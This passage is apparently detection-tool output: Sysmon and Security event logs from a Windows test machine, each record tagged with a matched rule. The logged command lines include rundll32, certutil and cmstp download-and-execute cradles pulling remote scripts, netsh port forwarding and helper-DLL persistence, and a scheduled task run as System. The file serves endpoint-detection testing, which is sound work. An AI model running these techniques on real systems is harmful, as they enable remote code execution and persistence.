21:33:59.368"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4954,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.442242Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port Forwarding"],"event":{"Event":{"EventData":{"CommandLine":"netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-001029398B00","ParentProcessId":6760,"ProcessGuid":"747F3D96-6647-5D3F-0000-001057768B00","ProcessId":4028,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.390"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4955,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.460197Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Netsh DLL Persistence"],"event":{"Event":{"EventData":{"CommandLine":"netsh.exe add helper AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh.exe add helper AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-001051388B00","ParentProcessId":3824,"ProcessGuid":"747F3D96-6647-5D3F-0000-0010927C8B00","ProcessId":5236,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.544"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4956,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.466817Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"192.168.1.1/8000","EventType":"SetValue","Image":"C:\\Windows\\system32\\netsh.exe","ProcessGuid":"747F3D96-6647-5D3F-0000-001057768B00","ProcessId":4028,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PortProxy\\v4tov4\\tcp\\0.0.0.0/8080","UtcTime":"2019-07-29 21:33:59.803"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4957,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.707406Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-DCFC-5D3F-0000-0010F1520000","ProcessId":568,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NdisCap\\Start","UtcTime":"2019-07-29 21:34:00.367"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4962,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:01.057426Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-DCFC-5D3F-0000-0010F1520000","ProcessId":568,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NdisCap\\Start","UtcTime":"2019-07-29 21:34:00.678"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4964,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:01.660499Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6652-5D3F-0000-0010B9708C00","ProcessId":5844,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:10.292"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4969,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:10.373481Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6652-5D3F-0000-0010B9708C00","ParentProcessId":5844,"ProcessGuid":"747F3D96-6652-5D3F-0000-001058828C00","ProcessId":348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:10.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4971,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:10.708142Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6657-5D3F-0000-001029198D00","ProcessId":1808,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:15.202"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4975,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:15.226408Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6657-5D3F-0000-001029198D00","ParentProcessId":1808,"ProcessGuid":"747F3D96-6657-5D3F-0000-001011298D00","ProcessId":1004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:15.502"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4977,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:15.658168Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-665C-5D3F-0000-0010096B8D00","ProcessId":7088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:20.134"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4978,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:20.238305Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-665C-5D3F-0000-0010096B8D00","ParentProcessId":7088,"ProcessGuid":"747F3D96-665C-5D3F-0000-0010E37B8D00","ProcessId":4520,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:20.410"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4980,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:20.459065Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bypass UAC via CMSTP"],"event":{"Event":{"EventData":{"CommandLine":"cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Connection Manager Profile Installer","FileVersion":"7.2.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=89030EB0DE2B856B47105CA67DAAC722ABAF0BDF,MD5=D9818B3C3BC0AF0A5374C71272581C08,SHA256=DB3F360BDB292C0679C13149AC6F454F7DCE768BDE559D87CE718023A6985A0D,IMPHASH=109BA8ED3C458360A74EA1216207CA09","Image":"C:\\Windows\\System32\\cmstp.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6661-5D3F-0000-00107AB88D00","ParentProcessId":6428,"ProcessGuid":"747F3D96-6661-5D3F-0000-0010CBC88D00","ProcessId":6820,"Product":"Microsoft(R) Connection Manager","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:25.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4985,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:25.659355Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe","ParentImage":"C:\\Windows\\System32\\forfiles.exe","ParentProcessGuid":"747F3D96-6666-5D3F-0000-0010AE068E00","ParentProcessId":1464,"ProcessGuid":"747F3D96-6666-5D3F-0000-0010DF098E00","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:30.552"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4989,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:30.807635Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Calculator Usage"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6670-5D3F-0000-001099048F00","ProcessId":2916,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:40.243"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5000,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:40.261289Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Calculator Usage"],"event":{"Event":{"EventData":{"CommandLine":"schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Task Scheduler Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69","Image":"C:\\Windows\\System32\\schtasks.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6670-5D3F-0000-001099048F00","ParentProcessId":2916,"ProcessGuid":"747F3D96-6670-5D3F-0000-0010F9148F00","ProcessId":7076,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence - Scheduled Task Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:40.755"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5002,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:40.889027Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":768617,"Execution_attributes":{"ProcessID":264,"ThreadID":796},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-15T19:28:17.594374Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x4c331","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 